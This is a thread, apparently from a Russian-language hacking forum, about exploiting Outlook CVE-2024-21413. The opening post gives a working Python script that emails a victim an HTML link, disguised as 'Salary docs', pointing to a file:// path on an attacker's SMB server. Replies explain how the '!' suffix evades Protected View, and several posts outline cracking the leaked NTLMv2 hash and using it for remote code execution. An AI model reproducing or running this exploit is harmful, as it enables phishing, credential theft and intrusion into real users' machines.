• XSS.stack #1 – первый литературный журнал от юзеров форума

Видео Outlook CVE-2024-21413 to RCE. Взлом через письмо

dunkel

(L1) cache
Пользователь
Регистрация
29.06.2023
Сообщения
921
Реакции
1 102
Гарант сделки
1
Депозит
0.012 Ł
CVE-2024-21413 + hashcat + crackmapexec smb = RCE
В 27 строке нужно указать путь до файла на твоем сервере. Для первого способа сам путь может быть любой/без файла, т.к чтобы соснифить NTLMv2 хеш достаточно предпросмотра moniker link атакующего в клиенте outlook.
Если жертва нажмет на ссылку то винда пойдет по ней и загрузит его, а если это word документ (например формата .rtf) то сразу откроет, привет CVE-2023-21716
Python:
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def send_email():
    # Get user input for sender's email address and password
    sender_email = input("Enter your Outlook email address: ")
    sender_password = input("Enter your Outlook email password: ")

    # Get user input for receiver's email address
    receiver_email = input("Enter the recipient's email address: ")

    # Create a new message object
    msg = MIMEMultipart()

    # Add sender, receiver, and subject to the message
    msg['From'] = sender_email
    msg['To'] = receiver_email
    msg['Subject'] = input("Enter email subject: ")

    # Ask user if they want to add a link attachment
    add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower()
    if add_attachment == 'yes':
        html_content = """\
        <!DOCTYPE html>
        <html lang="en">
            <body>
                <p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>
            </body>
        </html>"""
        msg.attach(MIMEText(html_content, 'html'))

    # Connect to SMTP server and send email
    with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
        server.starttls()
        server.login(sender_email, sender_password)
        server.send_message(msg)
        print("Email sent successfully.")

if __name__ == "__main__":
    send_email()
 
Последнее редактирование:
1722202722059.png

Хеш NTLMv2 кстати сниффится без участия юзера(даже не надо кликать, достаточно получить письмо), ктож знал что Office Protected View будет обходиться одним ! символом
Словарь из видео https://github.com/brannondorsey/naive-hashcat/releases/
 
Последнее редактирование:
Код:
https://blog.injectexp.dev/outlook-cve-2024-21413-for-rce-hacking-through-a-letter/07/rce/
DSASInject, некрасиво поступаете. При копировании нужно указывать автора (авторов, в т.ч. экспа) и источник.
 
Код:
https://blog.injectexp.dev/outlook-cve-2024-21413-for-rce-hacking-through-a-letter/07/rce/
DSASInject, некрасиво поступаете. При копировании нужно указывать автора (авторов, в т.ч. экспа) и источник.
Did DSASInject find this cve? or he just wrote the blog?
 
CVE-2024-21413 + hashcat + crackmapexec smb = RCE
В 27 строке нужно указать путь до файла на твоем сервере. Для первого способа сам путь может быть любой/без файла, т.к чтобы соснифить NTLMv2 хеш достаточно предпросмотра moniker link атакующего в клиенте outlook.
Если жертва нажмет на ссылку то винда пойдет по ней и загрузит его, а если это word документ (например формата .rtf) то сразу откроет, привет CVE-2023-21716
эпичная дырень
 
Хеш NTLMv2 кстати сниффится без участия юзера(даже не надо кликать, достаточно получить письмо), ктож знал что Office Protected View будет обходиться одним ! символом
Интересно что же это за символ :)
 
Отличное видео! Подскажи, куда нужно вписать этот символ?
Смотри скрипт эксплоита, там при отправке содержимого используется html разметка, и в строке <p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>в ссылке после uri идет ! дальше любые несколько asсii символов (у меня надпись xssvideo, может быть что угодно). Без этого знака Protected View отфильтрует ссылку, а с ним ссылка не попадает под regex паттерн, но остается валидной
 
Смотри скрипт эксплоита, там при отправке содержимого используется html разметка, и в строке <p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>в ссылке после uri идет ! дальше любые несколько asсii символов (у меня надпись xssvideo, может быть что угодно). Без этого знака Protected View отфильтрует ссылку, а с ним ссылка не попадает под regex паттерн, но остается валидной
Супер, спасибо
 
А в чем эксплойт то?

Это древний метод, эксплуатируемый еще с десятых. Винда при попытки прочитать файл по ссылочке шлет NTLM хэш, его брутят, потом делают pass the hash и исполняют код.

Я глядя на код не понял в чем отличие. Может я слепой. Или это они старому трюку присвоили CVE?
 
А в чем эксплойт то?

Это древний метод, эксплуатируемый еще с десятых. Винда при попытки прочитать файл по ссылочке шлет NTLM хэш, его брутят, потом делают pass the hash и исполняют код.

Я глядя на код не понял в чем отличие. Может я слепой. Или это они старому трюку присвоили CVE?
ну видимо в том что в outlook есть защита которая не позволяет использовать протокол file:// в гиперссылках, а тут это обходится и outlook без участия юзера идет по этой file:// ссылке
 
Это древний метод, эксплуатируемый еще с десятых. Винда при попытки прочитать файл по ссылочке шлет NTLM хэш, его брутят, потом делают pass the hash и исполняют код.
серьёзно? какой-то встроенный виндовый веб движок вставляет во все запросы NTLM хэш?!
 
Смотри скрипт эксплоита, там при отправке содержимого используется html разметка, и в строке <p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>в ссылке после uri идет ! дальше любые несколько asсii символов (у меня надпись xssvideo, может быть что угодно). Без этого знака Protected View отфильтрует ссылку, а с ним ссылка не попадает под regex паттерн, но остается валидной
Без клика по гиперссылке всё-таки не захотел отдавать хэш
 
серьёзно? какой-то встроенный виндовый веб движок вставляет во все запросы NTLM хэш?!
Там трюк в том, что ты заставлял запросить ресурс по пути которого требует авторизацию, и винда пытается её провести при помощи NTLMv2 хэша текущего пользователя.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх